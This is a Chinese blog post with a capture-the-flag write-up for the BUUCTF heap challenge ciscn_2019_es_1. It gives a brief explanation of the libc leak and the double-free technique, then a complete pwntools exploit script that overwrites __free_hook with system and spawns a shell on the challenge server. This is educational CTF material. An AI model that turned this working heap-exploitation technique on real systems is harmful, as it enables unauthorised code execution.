BUUCTF ciscn_2019_es_1

最新推荐文章于 2024-05-12 10:51:22 发布
最新推荐文章于 2024-05-12 10:51:22 发布
阅读量885 收藏
点赞数 1
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/103833924
版权

思路

首先申请一个smallbin大小的trunk然后释放打印得到libc基址,然后double free打fastbin attack之后写到libc去__malloc_hook写入one_gadget再次add获取shell
以下为ubuntu16的环境下本地也就是libc-2.23
这里题目是ubuntu18利用更加简单直接打free_hook
exp:

#!/usr/bin/python2
from pwn import *
local=0
if local==1:
    p=process('./ciscn_2019_es_1')
    elf=ELF('./ciscn_2019_es_1')
    libc=elf.libc
else:
    p=remote('node3.buuoj.cn',27202)
    elf=ELF('./ciscn_2019_es_1')
    libc=elf.libc

def add(size,name,compary):
    p.sendlineafter('choice:','1')
    p.sendlineafter('name',str(size))
    p.sendlineafter('name:',name)
    p.sendlineafter('call:',compary)

def show(idx):
    p.sendlineafter('choice:','2')
    p.sendlineafter('index:',str(idx))

def call(idx):
    p.sendlineafter('choice:','3')
    p.sendlineafter('index:',str(idx))

lg=lambda address,data:log.success('%s: '%(address)+hex(data))

def exp():
    add(0x410,'doudou','137')#0
    add(0x28,'doudou2','139')#1
    add(0x68,'/bin/sh\x00','139')#2
    add(0x30,'doudou1','138')#3
    call(0)
    show(0)
    libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96-0x10-libc.sym['__malloc_hook']
    malloc_hook=libcbase+libc.sym['__malloc_hook']
    one_gadget=libcbase+0x4f322
    free_hook=libcbase+libc.sym['__free_hook']
    system=libcbase+libc.sym['system']
    call(1)
    call(1)
    add(0x28,p64(free_hook),'141')
    add(0x28,'111','142')
    add(0x28,p64(system),'143')
    call(2)
    lg('libcbase',libcbase)
    p.interactive()

if __name__=="__main__":
    exp()
doudoudedi
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
赛点资源数据包_嵌入式_2019.zip
06-28
1. **硬件基础**:这部分可能包括各种微处理器和微控制器的介绍,如ARM架构、RISC-V等,以及它们的性能、功耗和应用范围。还可能涉及存储器类型(如RAM、ROM)和外设接口(如I2C、SPI、UART)。 2. **操作系统与...
Elasticsearch 中国开发者调查报告_2019.pdf
12-20
2010年 Elasticsearch 首个...为了深入了解 Elasticsearch 开发者群体的现状,2019 年 11 月,Elastic 技术社区、阿里巴巴 Elasticsearch 技术团队和阿里云开发者社区三方联合发起了 Elasticsearch 开发者调研活动。
[BUUCTF]PWN——ciscn_2019_es_1
mcmuyanga的博客
07-20 1321
ciscn_2019_es_1 装了一个ubuntu18.04的机子,终于可以做2.27的题目了 例行检查,64位程序,保护全开 本地运行一下程序,经典的堆体菜单 64位ida载入,看一下各个选项的函数
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7543
BUUCTF题目Misc部分wp(持续更新)
BUUCTF中 web 总结合集(正在更新中)
最新发布
2401_84969231的博客
05-12 373
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
BUUCTF Misc杂项前十二道题的思路和感悟
热门推荐
太阳照耀我走四方
08-18 1万+
title: BUUCTF Misc date: 2021年8月18日 17点27分 tags: MISC categories: MISC 1、BUUCTF 签到题 直接告诉了flag。 2、BUUCTF 第二题(Stegsolve) 下载附件之后,得到一个gif动图。 使用Stegsolve打开。 然后一张一张的向后翻, 得到flag{he11ohongke} 3、BUUCTF 二维码(QR Research、Ziperrllo、winhex) 下载附件之后是一个zip压缩包。 解压之后得到.
ciscn_2019_es_2【BUUCTF
qq_41696518的博客
09-02 841
与往常溢出不同的是,该溢出仅仅只能溢出8(0x30-0x28)字节的数据,恰好就是覆盖ebp和ret地址数据,并且存在两处溢出漏洞。因此可以用read函数将system(“/bin/sh”)读到当前栈中,并返回让其执行该函数即可。这里有两个问题,1.system(“/bin/sh”)存储地址如何得知 2. 如何返回该system地址执行函数。
BUUCTF】Web题解
xuanyulevel6的博客
08-08 5140
BUUCTF】Web题解
2019年欧洲车身会议蔚来ES8_Benchmark数据.pdf
01-21
2019年欧洲车身会议蔚来ES8_Benchmark数据
GLView.rar_class A_opengl es
09-19
A helper class to simplify writing an Activity that renders using OpenGL ES.
opengl-es.zip_opengl_opengl es
09-14
OpenGL ES(OpenGL for Embedded Systems)是OpenGL的一个精简版本,专为嵌入式设备和移动设备设计,如智能手机、平板电脑等。它主要用于处理2D和3D图形渲染,是开发游戏、图形应用和增强现实应用的核心技术。OpenGL...
[BUUCTF]PWN——ciscn_2019_es_2
mcmuyanga的博客
10-27 2264
ciscn_2019_es_2 附件 步骤: 例行检查,32位程序,开启了nx保护 32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用 system_addr=0x80048400 main函数 程序主体在vul函数里 读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入
BUUCTFPWN】ciscn_2019_es_2 栈迁移 栈劫持
m0_55368674的博客
01-16 624
BUUCTFPWN】ciscn_2019_es_2题解
ciscn_2019_es_2
z1r0的博客
12-08 200
ciscn_2019_es_2 查看保护 有溢出,但是溢出有限,所以可以考虑一下栈迁移。 栈迁移其实就是通过ebp和esp间接跳板来控制eip执行system即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 28028) else: r = pro
[BUUCTF]ciscn_2019_es_7(SROP)
zyxx_wjc的博客
07-12 323
[BUUCTF]ciscn_2019_es_7
BUUCTF Pwn ciscn_2019_n_1 1
qq_45200829的博客
11-08 334
BUUCTF Pwn类型 ciscn_2019_n_1 1 解题过程
BUUCTF ciscn_2019_n_1
RookieMOR的博客
05-14 615
1.下载文件,用checksec一下: 2.用IDA64查看,进入func函数: 当v2=11.28125时获得flag,但只有v1的输入,没有v2输入。因为有一个gets函数,点击v1,v2可以知道,v1与v2差44个字节,可以通过输入v1的值去改变v2的值,实现栈溢出。 查看汇编可以看到有一个uconiss的比较指令,把xmm0与cs:dword_4007F4,由movss可以知道xmme0是v1或v2的值,那么点击dword_4007F4 看到一个 dd ,百度一下可以知道,.
BUUCTF ciscn_2019_c_1 write up
qq_43189757的博客
09-06 4862
分析: 程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中 在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密 1.如果是小写字母跟0xD异或 2.如果是大写字母跟0xE异或 3.如果是数字跟0xF异或 在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据 二进制文件中没有出现getshell和system之类的函数,所以要通...
BUUCTF刷题之路-ciscn_2019_s_31
qq_30528603的博客
05-31 341
既然是栈溢出嘛,我们当然想调用system('/bin/sh')很可惜的是程序中没有给出,那就考虑是不是ret2libc,但是程序中我们并没有发现存在泄漏got表的代码,在看一眼函数列表我们看到了一个程序必带的初始化函数:_libc_csu_init这是做csu题目的基础。首先rax=59并且syscall的地址我们都已经有了,接着我们看如何构造bin/sh,我尝试过在程序中查找字符串,并没有结果,那么我们只能通过read函数写进去,并且我们准确把握写入的位置以便利用,所以我们需要泄露栈地址。
es 删除数据_干货 | 携程Elasticsearch数据同步实践
06-07
您需要关于 Elasticsearch 的数据删除操作的信息吗?如果是的话,可以使用 Elasticsearch 提供的 Delete API 来删除单个或多个文档。例如,您可以使用以下命令删除具有指定 ID 的单个文档: ``` DELETE /my_index/_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值